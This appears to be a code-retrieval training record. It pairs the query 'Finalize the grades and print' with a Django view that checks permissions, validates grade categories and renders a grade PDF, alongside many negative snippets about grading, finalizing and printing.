[ "0.6545719", "0.64571476", "0.6421992", "0.6398177", "0.6392814", "0.632745", "0.62147915", "0.6207807", "0.6147925", "0.61356354", "0.6131394", "0.612939", "0.61182773", "0.61020154", "0.6070016", "0.60693353", "0.605311", "0.6039241", "0.6023937", "0.60228825", "0.60228825", "0.5984762", "0.5980634", "0.59621537", "0.5956924", "0.59464365", "0.5941148", "0.5929363", "0.59024227", "0.5896444", "0.5894538", "0.58846885", "0.5883799", "0.58806276", "0.58700705", "0.5853246", "0.58471316", "0.5842201", "0.5840097", "0.5839575", "0.5814553", "0.58054835", "0.5803139", "0.580106", "0.5798838", "0.5792221", "0.5785201", "0.57833445", "0.5783336", "0.5782162", "0.5778324", "0.5778128", "0.57750714", "0.5773201", "0.5771534", "0.5766515", "0.5757946", "0.57347137", "0.57304966", "0.5717516", "0.5715068", "0.57082266", "0.5652748", "0.5650997", "0.5650997", "0.5650562", "0.5646426", "0.5634208", "0.5632559", "0.56318194", "0.56304055", "0.56296164", "0.5619609", "0.5613354", "0.5610097", "0.5603533", "0.559168", "0.558647", "0.55819565", "0.558118", "0.5576473", "0.5573608", "0.5568475", "0.5565287", "0.55640024", "0.55565417", "0.5556491", "0.55280614", "0.5527152", "0.5526561", "0.55226725", "0.5521137", "0.55144095", "0.5513783", "0.5505715", "0.55014443", "0.55009955", "0.55005527", "0.5492239", "0.54915875", "0.54875904" ]
0.0
-1
Finalize the grades and print. Only for assessors.
def finalize(request, pk, version=0): ts = get_timeslot() if not hasattr(ts, 'resultoptions'): raise PermissionDenied("Results menu is not yet visible.") else: if not get_timeslot().resultoptions.Visible: raise PermissionDenied("Results menu is not yet visible.") dstr = get_object_or_404(Distribution, pk=pk) if not hasattr(dstr, 'presentationtimeslot'): raise PermissionDenied('This student does not have a presentation planned. Please plan it first.') if not request.user.is_superuser and \ request.user not in dstr.presentationtimeslot.Presentations.Assessors.all() and \ request.user != dstr.Proposal.Track.Head: raise PermissionDenied("You are not the correct owner of this distribution. " " Grades can only be finalized by assessors or track heads. " " To get a preview of the print view, use the 'Print Preview' button.") version = int(version) # check if grade is valid error_list = '' for cat in GradeCategory.objects.filter(TimeSlot=get_timeslot()): try: cat_res = cat.results.get(Distribution=dstr) if not cat_res.is_valid(): error_list += ('<li>Category {} is not completed.</li>'.format(cat)) except CategoryResult.DoesNotExist: error_list += ('<li>Category {} is missing</li>'.format(cat)) if error_list: return render(request, "base.html", context={ 'Message': '<h1>The results of this student are not yet finished</h1><p>The following error(s) occurred:</p><ul>{}</ul>'.format(error_list), "return": "results:gradeformstaff", "returnget": str(pk), }) if version == 0: # The normal page summarizing the grades of the student return render(request, "results/finalize_grades.html", { "dstr": dstr, "catresults": dstr.results.all(), "final": all(f.Final is True for f in dstr.results.all()), "finalgrade": dstr.TotalGradeRounded(), "preview": False, }) else: # type 1 and 2, finalize grades. if get_timephase_number() != 7: raise PermissionDenied("Finalize grades is only possible in the time phase 'Presentation of results'") for cat in dstr.results.all(): # set final to True, disable editing from here onward. cat.Final = True cat.save() if version == 1: # printable page with grades return render(request, "results/print_grades_pdf.html", { "dstr": dstr, "catresults": dstr.results.all(), "finalgrade": dstr.TotalGradeRounded(), }) elif version == 2: # pdf with grades html = get_template('results/print_grades_pdf.html').render({ "dstr": dstr, "catresults": dstr.results.all(), "finalgrade": dstr.TotalGradeRounded(), }) buffer = BytesIO() pisa_status = pisa.CreatePDF(html.encode('utf-8'), dest=buffer, encoding='utf-8') if pisa_status.err: raise Exception("Pisa Failed PDF creation in print final grade for distribution {}.".format(dstr)) buffer.seek(0) response = HttpResponse(buffer, 'application/pdf') response['Content-Disposition'] = 'attachment; filename="bepresult_{}.pdf"'.format(dstr.Student.usermeta.get_nice_name()) return response raise PermissionDenied('Invalid type.')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():\n\n students = [\"Chris\", \"Jesse\", \"Sally\"]\n grades = [90, 80, 70]\n print_gradebook(students, grades)", "def finalize():\n\n print(\"\"\"\n The script analysis/sedov_compare.py can be used to analyze these\n results. That will perform an average at constant radius and\n compare the radial profiles to the exact solution. Sample exact\n data is provided as analysis/cylindrical-sedov.out\n \"\"\")", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def finalize(self):\n\t\tif self._sum_factor != 0.0:\n\t\t\tself._last_score = self._current_score / self._sum_factor\n\t\telse:\n\t\t\tself._last_score = 0.0\n\n\t\tself._scores.append(self._last_score)\n\t\tself._scores = self._scores[-self._range[1]:]\n\t\n\t\tself._sum_factor = 0.0\n\t\tself._current_score = 0.0", "def finalize(self):\n logger.debug(\"Generation Complete\")\n self.events.generation_complete()", "def finalize(self):\n print('Cleaning up...')", "def print_scores(self):\n ### FILL IN ###", "def finalize():\n global interpreter\n del interpreter\n blotish._cleanup()\n\n # Set the progress printing state to whatever it was before\n import paraview.servermanager\n global wasProgressPrinting\n paraview.servermanager.SetProgressPrintingEnabled(wasProgressPrinting)", "def print_grades(grades, grader_name):\n grades = sorted(grades,\n key=lambda grade: grade.student_name())\n # Length of longest name\n max_name_len = max(len(grade.student_name()) for grade in grades)\n\n grade_report = '\\n'.join(\n '{:<{max_name_len}}\\t{}\\t{}'.format(\n grade.student_name(),\n grade.score() if grade.graded() else '(ungraded)',\n grade.breakdown(grader_name) if grade.graded() else '',\n max_name_len=max_name_len)\n for grade in grades)\n click.echo_via_pager('grade report:\\n\\n' + grade_report)", "def print_allocations(self, ):\n pass", "def finalize(self):\r\n\r\n self.find_parents()\r\n self.order_vertices()\r\n self.set_rotation_matrices()", "def finalize(self):\n self.clear()\n sys.stderr.write(f\"{self._message} finished after {(time.time()-self._startTime):.1f}s \"\n \"at \"+time.strftime(\"%H:%M:%S\", time.localtime())+\" \\n\")", "def finalize(self):\n sys.stderr.write(f\"{self._message} finished after {(time.time()-self._startTime):.1f}s \"\n \"at \"+time.strftime(\"%H:%M:%S\", time.localtime())+\" \\n\")", "def finalize(self):\n sys.stderr.write(f\"{self._message} finished after {(time.time()-self._startTime):.1f}s \"\n \"at \"+time.strftime(\"%H:%M:%S\", time.localtime())+\" \\n\")", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def finalize(self):\n pass", "def test_a_grade(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.submit_question_answer('p3', {'2_1': 'Correct'})\r\n self.check_grade_percent(1.0)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'A')", "def finalize_scores(self):\n if self.candidates_finalized:\n return\n self.candidates_finalized = True\n for cand in self.candidates:\n new_logp_blank = cand.logp_total()\n last_word = cand.text_state.last_word\n if self.lm is not None and last_word != '':\n # Merging cands with texts differing only in the final sep was not done in the reference.\n new_lm_state = kenlm.State()\n logp_lm_last_word = self.lm.BaseScore(cand.lm_state, last_word, new_lm_state) * self.log10_to_ln\n cand.lm_state = new_lm_state\n if self.oov_score is not None and last_word not in self.lm:\n logp_lm_last_word = self.oov_score\n new_logp_blank += self.alpha * logp_lm_last_word + self.beta\n cand.logp_blank = new_logp_blank\n cand.logp_non_blank = -np.inf\n cand.new_logp_blank = None\n cand.new_logp_non_blank = None", "def print_results(self) -> None:\n print(\"=\" * 70, file=sys.stderr)\n total = 0.0\n max_points = 0.0\n for problem in self.problems:\n total += problem.run_tests()\n max_points += problem.max_grade\n print(f\"Total Grade: {total}/{max_points}\", file=sys.stderr)", "def finalize(self):\r\n pass", "def finalize(self):\n print(\"%d default sprite names found:\" % self.total_default)\n for name in self.list_default:\n print name", "def print_students_gpa(std):\n print (\"Student Id:\", get_id(std))\n print (\"Student name:\", get_fname(get_name(std)), get_lname(get_name(std)))\n print (\"GPA: %.2f\" %(calc_gpa(std)))", "def finalize(self):\n print(\"%d default backgdrop names found\" % self.total_default)\n for name in self.list_default:\n print name", "def finalize(self):\n return", "def finalize():\n pass", "def finalize():\n pass", "def finalize():", "def finalize():", "def finalize():", "def onFinish(self):\n self.finalizeStats()", "def finalize(self) -> None:\n pass", "def finish(self):\n if self.failed:\n print \"%s failed. %s of %s assertions passed.\" % (\n self.failed, self.passed, self.failed + self.passed)\n else:\n print \"%s of %s assertions passed.\" % (self.passed, self.passed)\n\n self.failed = self.passed = 0", "def final_report(self):\n print('Final Count for', self.reason, self.successes, 'of', self.tests, 'tests passed')", "def __exit__(self, *args):\n if self.silent:\n return\n\n # Print the final timer status\n color = self.final_color if self.deactivate else self.active_color\n\n if self.i > 1 or self.count is not None:\n num_iters = self.i if self.i > 0 else self.count\n\n # Display average time elapsed per instance\n self.display(\"[{0:.2g}s on avg]\".format(\n (time.time() - self.start) / num_iters),\n message=self.last_message,\n msg_color=color,\n timing_color=color,\n )\n else:\n # Display total time elapsed\n self.display(\"[{0:.2g}s]\".format(\n time.time() - self.start),\n message=self.last_message,\n msg_color=color,\n timing_color=color,\n )\n\n # Prevent the final timing string from being overwritten\n if self.newline:\n print(file=self.stream)", "def show_grades(state, from_dir):\n grading_manager = GradingManager(state.get_assignment(), from_dir)\n print_grades(grading_manager.grades(), state.user_name)", "def finalize(self):\n self.classifier.finalize()", "def print_grades(grades_input):\n for grade in grades_input:\n print grade", "def finalize_preview(request, pk, step=0):\n ts = get_timeslot()\n if not hasattr(ts, 'resultoptions'):\n raise PermissionDenied(\"Results menu is not yet visible.\")\n else:\n if not get_timeslot().resultoptions.Visible:\n raise PermissionDenied(\"Results menu is not yet visible.\")\n dstr = get_object_or_404(Distribution, pk=pk)\n if not hasattr(dstr, 'presentationtimeslot'):\n raise PermissionDenied('This student does not have a presentation planned. Please plan it first.')\n\n if not request.user.is_superuser and \\\n request.user != dstr.Proposal.Track.Head and \\\n request.user != dstr.Proposal.ResponsibleStaff and \\\n get_grouptype('3') not in request.user.groups.all() and \\\n request.user not in dstr.presentationtimeslot.Presentations.Assessors.all():\n raise PermissionDenied(\"You do not have the correct permissions to view print preview.\")\n return render(request, \"results/finalize_grades.html\", {\n \"dstr\": dstr,\n \"catresults\": dstr.results.all(),\n \"final\": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False,\n \"finalgrade\": dstr.TotalGradeRounded(),\n \"preview\": True,\n })", "def finalize(self):", "def finalize(self):", "def finalize(self):\n if not hasattr(self, 'finish'):\n self.logger.warning('Class does not have a finalize statement')", "def agent_cleanup(self):\n\n logging.info(\"Best score: %s\" % self.best_score_ever)\n\n if self.results_file:\n self.results_file.close()", "def finalize(self):\n self._iou_ap.compute_ap_curve()\n self._pixel_ap.compute_ap_curve()\n self._azimuth_ap.compute_ap_curve()\n self._polar_ap.compute_ap_curve()", "def finalize(self): # real signature unknown; restored from __doc__\n pass", "def finalize(self):\n\t\tself.logger.info(\"Please wait while finalizing the operation.. Thank you\")\n\t\tself.save_checkpoint()\n\t\tself.summary_writer.export_scalars_to_json(\"{}all_scalars.json\".format(self.config.summary_dir))\n\t\tself.summary_writer.close()\n\t\tself.data_loader.finalize()\n\t\tif self.config.output_model == True:\n\t\t\ttry:\n\t\t\t\tself.logger.info('Saving model for external usage.')\n\t\t\t\tself.load_checkpoint('model_best.pth.tar')\n\t\t\t\ttraced = torch.jit.trace(self.model,self.data_loader.train_loader.dataset[:2][0].float().to(self.device))\n\t\t\t\ttraced.save(self.config.output_model_path)\n\t\t\texcept IOError:\n\t\t\t\tself.logger.info('Output model path not found.')", "def print_stats(self):\n # Determine assignments with the maximum profit\n max_assignments = [a for a,p in self.finished_assignments.items()\n if p == self.max_profit]\n \n # Print general stats\n print('\\nTotal number of assignments: {}'.format(len(self.finished_assignments)))\n if self.fair:\n print('Maximum fair profit: {}'.format(self.max_profit))\n print('Number of max fair profit assignments: {}\\n'.format(len(max_assignments)))\n else:\n print('Maximum profit: {}'.format(self.max_profit))\n print('Number of max profit assignments: {}\\n'.format(len(max_assignments)))\n \n # Pretty print a single max assignment\n if max_assignments:\n print('Example of a maximum profit assignment:')\n for a, t in sorted((a,sorted(t)) for a, t in max_assignments[0].items()):\n print('Agent: {}\\tTasks: {}'.format(a, ', '.join(t)))", "def finalize(self):\n self.ratings.close()\n self.users.close()\n self.movies.close()", "def test_dropping_grades_normally(self):\r\n self.dropping_setup()\r\n self.dropping_homework_stage1()\r\n\r\n self.assertEqual(self.score_for_hw('homework1'), [1.0, 0.0])\r\n self.assertEqual(self.score_for_hw('homework2'), [1.0, 1.0])\r\n self.assertEqual(self.earned_hw_scores(), [1.0, 2.0, 0]) # Order matters\r\n self.check_grade_percent(0.75)", "def do_finalize(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tdef _finalize(self):\n\t\t\t# Stop all the modules\n\t\t\tself.stop_all()\n\t\t\t# Finalize in reverse order\n\t\t\tself.log('PHASE: finalizing object ' + str(self), level=logging.DEBUG)\n\t\t\t# Login at least once to get the exports.\n\t\t\tfor module_id in self.module_ids(rev=True):\n\t\t\t\t# Only finalize if it's thought to be installed.\n\t\t\t\tif self.is_installed(self.shutit_map[module_id]):\n\t\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\t\tif not self.shutit_map[module_id].finalize(self):\n\t\t\t\t\t\tself.fail(module_id + ' failed on finalize', shutit_pexpect_child=self.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\t\tself.logout(echo=False)\n\t\t_finalize(self)", "def testDriver():\n exam1=90\n exam2=85\n assignmentScores = [50, 60, 70, 80, ]\n computeGrades(exam1, exam2, assignmentScores)", "def dump_grading_context(course):\r\n hbar = \"{}\\n\".format(\"-\" * 77)\r\n msg = hbar\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\"\\\r\n % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += hbar\r\n msg += \"Listing grading context for course %s\\n\" % course.id.to_deprecated_string()\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsomething, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsomething)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n frmat = getattr(sdesc, 'format', None)\r\n aname = ''\r\n if frmat in graders:\r\n gform = graders[frmat]\r\n aname = '%s %02d' % (gform.short_label, gform.index)\r\n gform.index += 1\r\n elif sdesc.display_name in graders:\r\n gform = graders[sdesc.display_name]\r\n aname = '%s' % gform.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (format=%s, Assignment=%s%s)\\n\"\\\r\n % (sdesc.display_name, frmat, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def finalize() -> None:\n collective.finalize()", "def Finalize():\n pass", "def finalize(self):\r\n self.outfile_param.close()\r\n self.outfile_sim.close()", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def publish_grade(self):\r\n score = self.lcp.get_score()\r\n self.runtime.publish(\r\n self,\r\n 'grade',\r\n {\r\n 'value': score['score'],\r\n 'max_value': score['total'],\r\n }\r\n )\r\n\r\n return {'grade': score['score'], 'max_grade': score['total']}", "def finalize(self):\n \n if self.outpath:\n # User specified an file path to which to write\n # the Group Scheduling Events, Attempt to open\n # specified file for writing.\n #\n try:\n outstream = open(self.outpath, 'w')\n except IOError, eargs:\n # Nope, it isn't writable due to an IOError. \n # Let them know the error and warn them that\n # the default action is to fallback to stdout\n # as an output stream if the output they \n # specify fails to initialize.\n #\n print 'Error: CCSMFilter.finalize : %s' % eargs\n print 'Warning: Falling back to output stream sys.stdout'\n outstream = sys.stdout\n else:\n outstream = sys.stdout\n \n # Print all the events to the output stream.\n # \n for ccsm_event in self.ccsm_events:\n print >> outstream, ccsm_event\n \n # Check to see if the pointer to \n # stdout is the same as the pointer\n # to our outstream.\n #\n if outstream != sys.stdout:\n # It isn't so close the file. \n # If our outstream was stdout you probably wouldn't\n # want to close it.\n #\n outstream.close()", "def finalize(self):\n self.logger.debug(\"Finalizing...\")\n self.listeners = []\n self.finalizing = True", "def finalize(self):\n import pickle\n logger.info('*** crash task summary:')\n logger.info('*** N: %d',self.N)\n logger.info('*** done_counter: %d',self.done_counter)\n logger.info('*** completed_counter: %d',self.completed_counter)\n logger.info('*** ignored_counter: %d',self.ignored_counter)\n pickle.dump(self,file('crash.pp','w'))", "def print_output(filtered_courses_list):\n\n if not filtered_courses_list:\n print(\"No courses matched the query.\")\n return\n\n max_name_length = max([len(course.name) for course in filtered_courses_list])\n\n print(\" Sem | Course ID | Pts | \" +\n \" \" * ((max_name_length - 11) // 2 + (max_name_length - 1) % 2) + \"Course Name\" + \" \" * ((max_name_length - 11) // 2) +\n \" | Grade\")\n print(\"______|___________|_____|\" + \"_\" * (max_name_length + 2) + \"|______\")\n\n for course in filtered_courses_list:\n print(str(course.year) + course.semester, end=\" | \")\n print(course.cid, end=\" | \")\n print(course.creditpts, end=\" | \")\n print(course.name, end=\" \" * (max_name_length - len(course.name) + 1) + \"| \")\n\n print(course.grade)\n\n print(\"\\nGPA: \" + (\"%.3f\" % calculate_weighted_average(filtered_courses_list)))", "def _Finalize(self):\n logging.debug(\"Sumparts = %s\", self.sumparts)\n if self.sumparts:\n # Because some files may have corresponded to subtracks of a single logical\n # track, it's possible that the number of items in ``self.tracks`` is greater\n # than the actual number of tracks, so the correct thing to do is take\n # the largest track number\n logging.debug(\"Summing parts\")\n self[\"TOTAL_PARTS\"] = str(max(int(x[\"track\"]) for x in self.tracks))\n elif \"TOTAL_PARTS\" in self:\n logging.debug(\"Deleting 'TOTAL_PARTS'\")\n del self[\"TOTAL_PARTS\"]\n else:\n logging.debug(\"Not summing parts and 'TOTAL_PARTS' doesn't exist\")\n if len(self[\"DATE_RECORDED\"]) != 4:\n logging.debug(\"Improper date found %s\", self[\"DATE_RECORDED\"])\n year = re.split(\"-|/|\\.\", self[\"DATE_RECORDED\"])\n for y in year:\n if len(y) == 4:\n logging.debug(\"Found year %s\", y)\n self[\"DATE_RECORDED\"] = y\n break\n else:\n raise RuntimeError(f\"Can't parse date {self['DATE_RECORDED']}\")\n if any('phase' in t for t in self.tracks) and 'PHASE_NAME' not in self.data:\n self.data['PHASE_NAME'] = 'Phase'", "def finalize(self):\n # Set the title and axis labels\n self.set_title(\"Cook's Distance Outlier Detection\")\n self.ax.set_xlabel(\"instance index\")\n self.ax.set_ylabel(\"influence (I)\")\n\n # Only add the legend if the influence threshold has been plotted\n if self.draw_threshold:\n self.ax.legend(loc=\"best\", frameon=True)", "def show_all(self):\n self.explained_variance_score()\n self.max_error()\n self.mean_absolute_error()\n self.mean_squared_error()\n self.median_absolute_error()\n self.r2_score()\n self.mean_poisson_deviance()\n self.mean_gamma_deviance()\n self.feature_importance()\n self.learning_curve()", "def dump_grading_context(course):\r\n msg = \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\" % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Listing grading context for course %s\\n\" % course.id\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsections, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsections)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n grade_format = getattr(sdesc, 'grade_format', None)\r\n aname = ''\r\n if grade_format in graders:\r\n gfmt = graders[grade_format]\r\n aname = '%s %02d' % (gfmt.short_label, gfmt.index)\r\n gfmt.index += 1\r\n elif sdesc.display_name in graders:\r\n gfmt = graders[sdesc.display_name]\r\n aname = '%s' % gfmt.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (grade_format=%s, Assignment=%s%s)\\n\" % (s.display_name, grade_format, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def finalize(self) -> None:\n # Finalize function of bmi class of lisflood is kaput, so not calling it\n del self._bmi", "def finalize(self):\n self.report('Finalizing optimization procedure.')\n with self.optimizer() as opt:\n optimal_process_output = opt.result_value\n optimal_process_output.store()\n self.out('optimal_process_output', optimal_process_output)\n result_index = opt.result_index\n optimal_process = self.ctx[self.eval_key(result_index)]\n self.out('optimal_process_uuid', Str(optimal_process.uuid).store())", "def finalize(self):\n # 027 Filling-in of the total_count column.\n self.logger.debug(\"Finalizing the bow table. Counting the total_count column.\")\n # 027 Find how many lines are in bow table.\n bowLinesCount=self.getTableLinesCount(\"BOW\",\"bow_id\")\n # 027 Now count and update the line sumation for each line.\n for cx in range(bowLinesCount): self.sumBowLine(cx+1)\n self.DBconnection.commit()", "def mark_as_done(self):\n grade_event = {'value': self.points, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def print_scores(self):\n print(\"scores: \", self.get_scores())", "def finalize(self):\n if self.logging:\n self.train_writer.close()", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def stats(self):\n\t\t\n\t\tx = [self.authorities[i] for i in self.authorities if self.authorities[i] != 1]\n\t\txx = sorted(x)\n\t\tl = float(len(xx))\n\t\tprint \"-----------\"\n\t\tprint \"Population : \" + str(l)\n\t\tprint \"-----------\"\n\t\tprint \"Q1 = \" + str(xx[int(l/4)])\n\t\tprint \"Q3 = \" + str(xx[int(float(l/4)*3)])\n\t\tprint \"-----------\"\n\t\tprint \"01/08 = \" + str(xx[int(l/8)])\n\t\tprint \"07/08 = \" + str(xx[int(float(l/8)*7)])\n\t\tprint \"-----------\"\n\t\tprint \"01/16 = \" + str(xx[int(l/16)])\n\t\tprint \"15/16 = \" + str(xx[int(float(l/16)*15)])\n\t\tprint \"-----------\"\n\t\tprint \"01/32 = \" + str(xx[int(l/32)])\n\t\tprint \"31/32 = \" + str(xx[int(float(l/32)*31)])\n\t\tprint \"-----------\"\n\t\tprint \"01/64 = \" + str(xx[int(l/64)])\n\t\tprint \"63/64 = \" + str(xx[int(float(l/64)*63)])\n\t\tprint \"-----------\"\n\t\tprint \"01/128 = \" + str(xx[int(l/128)])\n\t\tprint \"127/128 = \" + str(xx[int(float(l/128)*127)])\n\t\tprint \"-----------\"\n\t\tprint \"01/256 = \" + str(xx[int(l/256)])\n\t\tprint \"255/256 = \" + str(xx[int(float(l/256)*255)])\n\t\tprint \"-----------\"\n\t\tprint \"01/512 = \" + str(xx[int(l/512)])\n\t\tprint \"511/512 = \" + str(xx[int(float(l/512)*511)])\n\t\tprint \"-----------\"", "def computeGrades(e1, e2, a):\n \n a = assignmentScores\n a.sort()\n i=0\n while i<10:\n sum+=sum a[i]\n avg = sum/10\n \n grade = ((e1 + e2) /2) * 0.4 + (avg) * 0.6\n \n return grade\n \n if grade >= 90 and grade <= 100:\n return(\"A\")\n \n elif grade >= 80 and grade < 90:\n return(\"B\")\n \n elif grade >= 70 and grade < 80:\n return(\"C\")\n \n elif grade >= 60 and grade < 70:\n return(\"D\")\n \n elif grade < 60:\n return(\"F\")", "def finalize():\n global interpreter\n interpreter = None\n global doProgressToggle\n if doProgressToggle: paraview.servermanager.ToggleProgressPrinting()", "def finalize_submission(self, submission_dir):\n raise NotImplementedError", "def finalize(self):\n self.isOver = True\n self.currentIteration = -1", "def clean_up(self) -> None:\n print('Doing some clean-up work...')", "def GradeManager():\r\n quit_program = False\r\n while quit_program is False:\r\n user_input = input('$ ')\r\n n = user_input.find(' ') # separates argument and command\r\n if user_input[:n] == 'AddStudent':\r\n add_student(user_input[n + 1:])\r\n elif user_input[:n] == 'DeleteStudent':\r\n delete_student(user_input[n+1:])\r\n elif user_input[:n] == 'SortRoster':\r\n sort_roster(user_input[n+1:])\r\n elif user_input[:n] == 'FindByFName':\r\n find_by_name('FindByFName', user_input[n+1:])\r\n elif user_input[:n] == 'FindByLName':\r\n find_by_name('FindByLName', user_input[n+1:])\r\n elif user_input[:n] == 'GetAverage':\r\n get_average(user_input[n+1:])\r\n elif user_input == 'PrintRoster':\r\n for student in StudentRoster:\r\n print(student_format(student))\r\n elif user_input == 'Quit': # test\r\n quit_program = True", "def finalize_statistics_collection(self):\n # Close all files.\n self.testing_batch_stats_file.close()\n self.testing_set_stats_file.close()", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def test_none_grade(self):\r\n self.basic_setup()\r\n self.check_grade_percent(0)\r\n self.assertEqual(self.get_grade_summary()['grade'], None)", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def finalize(self, **kwargs: Any) -> None:\n pass", "def perform_final_actions(self):\n for finalizer_function in self._finalizer_functions:\n finalizer_function()", "def finalize(self):\n\n if self.finalized:\n return\n\n # Instantiate radial cells\n for pin in self.pincells:\n if isinstance(pin, InfinitePinCell) and not pin.finalized:\n pin.finalize()\n \n # Instantiate the axial cells\n for i, (pin, plane) in enumerate(zip(self.pincells, self.axials)):\n\n label = \"{0} axial {1}: {2}\".format(self.name, i, pin.name)\n cell = openmc.Cell(name=label, fill=pin)\n\n if i == 0:\n # Bottom section\n cell.region = -plane\n\n else:\n # Middle section\n cell.region = -plane & +self.axials[i-1]\n\n self.add_cell(cell)\n\n # Top section\n label = \"{0} axial top: {1}\".format(self.name, self.pincells[-1].name)\n cell = openmc.Cell(name=label, fill=self.pincells[-1])\n cell.region = +self.axials[-1]\n \n self.add_cell(cell)\n \n self.finalized = True", "def disp_score():", "def finish(self):\n distinct_users = set(self.users)\n\n output = []\n f_measures = []\n for user in distinct_users:\n output.append(user)\n tp, tn, fp, fn = 0.0, 0.0, 0.0, 0.0\n for reported, present, event_user in zip(self.alarms, self.anomalies, self.users):\n if event_user != user:\n continue\n if present and reported:\n tp += 1\n elif not present and not reported:\n tn += 1\n elif not present and reported:\n fp += 1\n elif present and not reported:\n fn += 1\n output.append('True positive: %i' % tp)\n output.append('True negative: %i' % tn)\n output.append('False positive: %i' % fp)\n output.append('False negative: %i' % fn)\n if tp == 0:\n f_measure = 0\n else:\n f_measure = 2.0 * tp / (2 * tp + fn + fp)\n f_measures.append(f_measure)\n output.append('F-measure: %0.4f' % f_measure)\n output.append('-------------------------------------')\n avg_f_measure = 1.0 * sum(f_measures) / len(f_measures)\n output.append('Score (avg. user F-measure): %0.6f' % avg_f_measure)\n str_output = '\\n'.join(output)\n print(str_output)\n logger.debug(str_output)", "def finalize(self):\n self.total_priors = np.sum(list(self.priors.values()))\n self.total_blocks = np.sum(list(self.nblocks.values()))\n self.total_fitness = np.sum(list(self.fitness.values()))\n self.blocks = BedTool.from_dataframe(self.df)", "def finalize(self):\n raise NotImplementedError('Must be implemented in subclasses.')", "def export(state, from_dir):\n\n grading_manager = GradingManager(state.get_assignment(), from_dir)\n state.grades = list(grade for grade in grading_manager.grades()\n if grade.graded())", "def finalize(self):\n for (phi_i, clsweights) in self.weights.iteritems():\n for (cls, weight) in clsweights.iteritems():\n weight.average(self.time)", "def do_finalize():\n\tdef _finalize(shutit):\n\t\t# Stop all the modules\n\t\tshutit.stop_all()\n\t\t# Finalize in reverse order\n\t\tshutit.log('PHASE: finalizing object ' + str(shutit), level=logging.DEBUG)\n\t\t# Login at least once to get the exports.\n\t\tfor module_id in shutit.module_ids(rev=True):\n\t\t\t# Only finalize if it's thought to be installed.\n\t\t\tif shutit.is_installed(shutit.shutit_map[module_id]):\n\t\t\t\tshutit.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\tif not shutit.shutit_map[module_id].finalize(shutit):\n\t\t\t\t\tshutit.fail(module_id + ' failed on finalize', shutit_pexpect_child=shutit.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\tshutit.logout(echo=False)\n\t\tfor fshutit in 